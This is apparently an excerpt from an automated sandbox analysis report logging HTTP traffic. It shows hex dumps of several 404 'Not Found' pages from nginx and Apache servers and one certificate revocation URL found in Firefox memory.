Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 09:54:05 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cd104a-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 09:54:11 GMTServer: Apache/2.4.6 (CentOS)Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 68 32 74 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dh2t/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 09:54:13 GMTServer: Apache/2.4.6 (CentOS)Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 68 32 74 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dh2t/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 09:54:16 GMTServer: Apache/2.4.6 (CentOS)Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 68 32 74 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dh2t/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 09:54:19 GMTServer: Apache/2.4.6 (CentOS)Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 68 32 74 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dh2t/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 09:54:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 89 a2 ca 2f 5d 3f b0 9c 1b de 33 e1 df e6 6c 65 38 c6 8d e9 75 01 ba 69 cc df be 59 99 81 d1 99 2d 0d cf 37 03 bd fb ef bf 7e 3f 18 75 c3 bb 8e b1 32 f5 ee ad 65 de ad 5d 2f 00 fc ae 13 98 0e 94 ba b3 e6 c1 52 9f 9b b7 d6 cc 1c 90 1f 9c e5 58 81 65 d8 03 7f 66 d8 a6 2e 66 41 78 ee b5 1b f8 29 00 8e 6b 39 73 f3 23 94 0a ac c0 36 df fe f3 ff f8 9f ff db ff fc 5f ff f9 5f ff fc 7f ff f9 7f ff cf ff fd 9f ff d5 81 8b ff 71 ea 5c fb eb 29 5c fd d7 3f ff 9f 7f fe 5f ff fc 1f 78 f5 e6 8c 56 78 e3 07 f7 b6 d9 59 99 73 cb d0 bb 86 6d 77 df 9e 7d 73 f2 cd e7 fe 77 f2 cd 3f be ea 74 90 8e ce cc f7 3b fc 99 e3 ce cd ab 95 3b df d8 a6 7f 06 b7 06 b6 6b cc 4d ef 8c b0 8f ff cd 3f 3f 9f d9 ae 63 ce ff 0a 05 de 9b c1 40 e3 37 be 79 21 5e 9e e4 aa ae 41 08 52 d5 7d 6f 16 83 c8 17 85 7f 71 b9 b9 e5 07 67 b3 df 7c 5a ec da 5c 9d 5d db ee ec 83 cf 47 02 78 76 0d c2 77 13 7d f1 58 b7 83 74 00 15 ff 78 6e 66 b6 fe 3b fb 8a a7 74 3d 00 1f d6 b6 71 3f 59 d8 e6 c7 29 7e 0c e6 96 67 ce 02 cb 75 26 33 d7 de ac 9c 29 19 06 13 51 10 be 9e ae 2c 87 8e 8a 89 2c 09 eb 8f d3 a5 69 dd 2c 03 fa 6c 6d cc e7 30 1a 27 ea 70 fd b1 23 74 84 e9 ca f0 6e 2c 67 22 4c 01 8e eb 4d fe 45 d6 14 f8 7f ba 80 a1 32 11 25 28 f4 23 8c 19 8f fb d6 83 d1 c5 fd 60 da b7 66 60 cd 8c ce 4f e6 c6 4c 7e 72 df 7b a6 f9 de 70 7c ce 87 8f 01 0c 7e 6b 31 bd 36 66 1f 6e 3c 77 e3 cc 27 ff b2 58 2c a6 83 3b f3 fa 83 15 0c 02 63 3d 58 42 8b 6c 6c d5 80 a2 0d 3c a8 b7 36 3c 18 9d 5b d4 3a 13 c7 0d 7a 7c 4a d3 f4 3b 11 2f 5c d0 2b 0b db bd 1b 7c 9c 2c ad f9 dc 74 b6 7f 20 c3 b0 d3 4b e8 16 05 49 59 7f ec 3f a4 21 d4 00 d8 86 8f ae 50 f7 5d 41 33 3e 00 8b 1e 10 5c c2 ba db 65 b6 94 e9 79 ae 47 01 46 3c 15 76 34 fd 6a 65 3a 9b 01 16 c6 8e 83 e7 73 73 ce 35 af 32 30 66 58 26 42 3b 08 dc 35 a0 6e c6 84 32 b8 39 80 db 86 4d 10 51 d6 0e d0 8c 72 f2 76 49 45 a6 74 6a 04 8c c7 1a b4 6a 07 93 e1 89 b5 b8 1f 5c 7b ee 1d 88 ee d5 ad e5 5b d7 76 16 a6 aa 34 26 6e 47 9b 4a f9 c1 da 92 a4 73 dc 6b cb 36 07 91 4c 5f 51 89 e6 a2 c7 fe e6 1a 59 7c e5 ae 4d d0 d2 b1 e8 47 82 bf 83 2f 57 0b d7 85 c1 3f 98 bb 77 ce 4e 41 2d 6f c8 8e 5a 55 ed 0b 09 6f 2a 4e bb c0 35 16 cf 52 a2 4a e0 f2 56 d2 ed 91 b2 26 53 d5 b6 8c 97 0f a8 c2 27 22 e8 5f 63 13 b8 d3 7c af a4 80 65 ab 65 35 d2 d7 4d a9 c9 c0 2a a1 a1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 09:54:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 89 a2 ca 2f 5d 3f b0 9c 1b de 33 e1 df e6 6c 65 38 c6 8d e9 75 01 ba 69 cc df be 59 99 81 d1 99 2d 0d cf 37 03 bd fb ef bf 7e 3f 18 75 c3 bb 8e b1 32 f5 ee ad 65 de ad 5d 2f 00 fc ae 13 98 0e 94 ba b3 e6 c1 52 9f 9b b7 d6 cc 1c 90 1f 9c e5 58 81 65 d8 03 7f 66 d8 a6 2e 66 41 78 ee b5 1b f8 29 00 8e 6b 39 73 f3 23 94 0a ac c0 36 df fe f3 ff f8 9f ff db ff fc 5f ff f9 5f ff fc 7f ff f9 7f ff cf ff fd 9f ff d5 81 8b ff 71 ea 5c fb eb 29 5c fd d7 3f ff 9f 7f fe 5f ff fc 1f 78 f5 e6 8c 56 78 e3 07 f7 b6 d9 59 99 73 cb d0 bb 86 6d 77 df 9e 7d 73 f2 cd e7 fe 77 f2 cd 3f be ea 74 90 8e ce cc f7 3b fc 99 e3 ce cd ab 95 3b df d8 a6 7f 06 b7 06 b6 6b cc 4d ef 8c b0 8f ff cd 3f 3f 9f d9 ae 63 ce ff 0a 05 de 9b c1 40 e3 37 be 79 21 5e 9e e4 aa ae 41 08 52 d5 7d 6f 16 83 c8 17 85 7f 71 b9 b9 e5 07 67 b3 df 7c 5a ec da 5c 9d 5d db ee ec 83 cf 47 02 78 76 0d c2 77 13 7d f1 58 b7 83 74 00 15 ff 78 6e 66 b6 fe 3b fb 8a a7 74 3d 00 1f d6 b6 71 3f 59 d8 e6 c7 29 7e 0c e6 96 67 ce 02 cb 75 26 33 d7 de ac 9c 29 19 06 13 51 10 be 9e ae 2c 87 8e 8a 89 2c 09 eb 8f d3 a5 69 dd 2c 03 fa 6c 6d cc e7 30 1a 27 ea 70 fd b1 23 74 84 e9 ca f0 6e 2c 67 22 4c 01 8e eb 4d fe 45 d6 14 f8 7f ba 80 a1 32 11 25 28 f4 23 8c 19 8f fb d6 83 d1 c5 fd 60 da b7 66 60 cd 8c ce 4f e6 c6 4c 7e 72 df 7b a6 f9 de 70 7c ce 87 8f 01 0c 7e 6b 31 bd 36 66 1f 6e 3c 77 e3 cc 27 ff b2 58 2c a6 83 3b f3 fa 83 15 0c 02 63 3d 58 42 8b 6c 6c d5 80 a2 0d 3c a8 b7 36 3c 18 9d 5b d4 3a 13 c7 0d 7a 7c 4a d3 f4 3b 11 2f 5c d0 2b 0b db bd 1b 7c 9c 2c ad f9 dc 74 b6 7f 20 c3 b0 d3 4b e8 16 05 49 59 7f ec 3f a4 21 d4 00 d8 86 8f ae 50 f7 5d 41 33 3e 00 8b 1e 10 5c c2 ba db 65 b6 94 e9 79 ae 47 01 46 3c 15 76 34 fd 6a 65 3a 9b 01 16 c6 8e 83 e7 73 73 ce 35 af 32 30 66 58 26 42 3b 08 dc 35 a0 6e c6 84 32 b8 39 80 db 86 4d 10 51 d6 0e d0 8c 72 f2 76 49 45 a6 74 6a 04 8c c7 1a b4 6a 07 93 e1 89 b5 b8 1f 5c 7b ee 1d 88 ee d5 ad e5 5b d7 76 16 a6 aa 34 26 6e 47 9b 4a f9 c1 da 92 a4 73 dc 6b cb 36 07 91 4c 5f 51 89 e6 a2 c7 fe e6 1a 59 7c e5 ae 4d d0 d2 b1 e8 47 82 bf 83 2f 57 0b d7 85 c1 3f 98 bb 77 ce 4e 41 2d 6f c8 8e 5a 55 ed 0b 09 6f 2a 4e bb c0 35 16 cf 52 a2 4a e0 f2 56 d2 ed 91 b2 26 53 d5 b6 8c 97 0f a8 c2 27 22 e8 5f 63 13 b8 d3 7c af a4 80 65 ab 65 35 d2 d7 4d a9 c9 c0 2a a1 a1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 09:54:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 89 a2 ca 2f 5d 3f b0 9c 1b de 33 e1 df e6 6c 65 38 c6 8d e9 75 01 ba 69 cc df be 59 99 81 d1 99 2d 0d cf 37 03 bd fb ef bf 7e 3f 18 75 c3 bb 8e b1 32 f5 ee ad 65 de ad 5d 2f 00 fc ae 13 98 0e 94 ba b3 e6 c1 52 9f 9b b7 d6 cc 1c 90 1f 9c e5 58 81 65 d8 03 7f 66 d8 a6 2e 66 41 78 ee b5 1b f8 29 00 8e 6b 39 73 f3 23 94 0a ac c0 36 df fe f3 ff f8 9f ff db ff fc 5f ff f9 5f ff fc 7f ff f9 7f ff cf ff fd 9f ff d5 81 8b ff 71 ea 5c fb eb 29 5c fd d7 3f ff 9f 7f fe 5f ff fc 1f 78 f5 e6 8c 56 78 e3 07 f7 b6 d9 59 99 73 cb d0 bb 86 6d 77 df 9e 7d 73 f2 cd e7 fe 77 f2 cd 3f be ea 74 90 8e ce cc f7 3b fc 99 e3 ce cd ab 95 3b df d8 a6 7f 06 b7 06 b6 6b cc 4d ef 8c b0 8f ff cd 3f 3f 9f d9 ae 63 ce ff 0a 05 de 9b c1 40 e3 37 be 79 21 5e 9e e4 aa ae 41 08 52 d5 7d 6f 16 83 c8 17 85 7f 71 b9 b9 e5 07 67 b3 df 7c 5a ec da 5c 9d 5d db ee ec 83 cf 47 02 78 76 0d c2 77 13 7d f1 58 b7 83 74 00 15 ff 78 6e 66 b6 fe 3b fb 8a a7 74 3d 00 1f d6 b6 71 3f 59 d8 e6 c7 29 7e 0c e6 96 67 ce 02 cb 75 26 33 d7 de ac 9c 29 19 06 13 51 10 be 9e ae 2c 87 8e 8a 89 2c 09 eb 8f d3 a5 69 dd 2c 03 fa 6c 6d cc e7 30 1a 27 ea 70 fd b1 23 74 84 e9 ca f0 6e 2c 67 22 4c 01 8e eb 4d fe 45 d6 14 f8 7f ba 80 a1 32 11 25 28 f4 23 8c 19 8f fb d6 83 d1 c5 fd 60 da b7 66 60 cd 8c ce 4f e6 c6 4c 7e 72 df 7b a6 f9 de 70 7c ce 87 8f 01 0c 7e 6b 31 bd 36 66 1f 6e 3c 77 e3 cc 27 ff b2 58 2c a6 83 3b f3 fa 83 15 0c 02 63 3d 58 42 8b 6c 6c d5 80 a2 0d 3c a8 b7 36 3c 18 9d 5b d4 3a 13 c7 0d 7a 7c 4a d3 f4 3b 11 2f 5c d0 2b 0b db bd 1b 7c 9c 2c ad f9 dc 74 b6 7f 20 c3 b0 d3 4b e8 16 05 49 59 7f ec 3f a4 21 d4 00 d8 86 8f ae 50 f7 5d 41 33 3e 00 8b 1e 10 5c c2 ba db 65 b6 94 e9 79 ae 47 01 46 3c 15 76 34 fd 6a 65 3a 9b 01 16 c6 8e 83 e7 73 73 ce 35 af 32 30 66 58 26 42 3b 08 dc 35 a0 6e c6 84 32 b8 39 80 db 86 4d 10 51 d6 0e d0 8c 72 f2 76 49 45 a6 74 6a 04 8c c7 1a b4 6a 07 93 e1 89 b5 b8 1f 5c 7b ee 1d 88 ee d5 ad e5 5b d7 76 16 a6 aa 34 26 6e 47 9b 4a f9 c1 da 92 a4 73 dc 6b cb 36 07 91 4c 5f 51 89 e6 a2 c7 fe e6 1a 59 7c e5 ae 4d d0 d2 b1 e8 47 82 bf 83 2f 57 0b d7 85 c1 3f 98 bb 77 ce 4e 41 2d 6f c8 8e 5a 55 ed 0b 09 6f 2a 4e bb c0 35 16 cf 52 a2 4a e0 f2 56 d2 ed 91 b2 26 53 d5 b6 8c 97 0f a8 c2 27 22 e8 5f 63 13 b8 d3 7c af a4 80 65 ab 65 35 d2 d7 4d a9 c9 c0 2a a1 a1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 09:54:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 66 65 62 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 64 61 74 61 2d 70 61 6e 65 6c 2d 75 72 6c 3d 22 68 74 74 70 73 3a 2f 2f 73 65 72 76 65 72 31 31 35 2e 68 6f 73 74 69 6e 67 2e 72 65 67 2e 72 75 2f 6d 61 6e 61 67 65 72 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 26 6e 62 73 70 3b d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2f 2a 21 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 21 2a 5c 0a 20 20 21 2a 2a 2a 20 63 73 73 20 2e 2f 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 2f 63 73 73 2d 6c 6f 61 64 65 72 2f 69 6e 64 65 78 2e 6a 73 3f 3f 63 6c 6f 6e 65 64 52 75 6c 65 53 65 74 2d 36 2e 75 73 65 5b 31 5d 21 2e 2f 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 2f 70 6f 73 74 63 73 73 2d 6c 6f 61 64 65 72 2f 73 72 63 2f 69 6e 64 65 78 2e 6a 73 21 2e 2f 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 2f 6c 65 73 73 2d 6c 6f 61 64 65 72 2f 64 69 73 74 2f 63 6a 73 2e 6a 73 21 2e 2f 62 65 6d 2f 62 6c 6f 63 6b 73 2e 61 64 61 70 74 69 76 65 2f 62 2d 70 61 67 65 2f 62 2d 70 61 67 65 2e 6c 65 73 73 20 2a 2a 2a 21 0a 20 20 5c 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2f 0a 2e 62 2d 70 61 67 65 7b 64 69 73 70 6c 61 79 3a

Source: firefox.exe, 00000007.00000003.21525821135.0000024AE8B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://c.pki.goog/r/r1.crl0
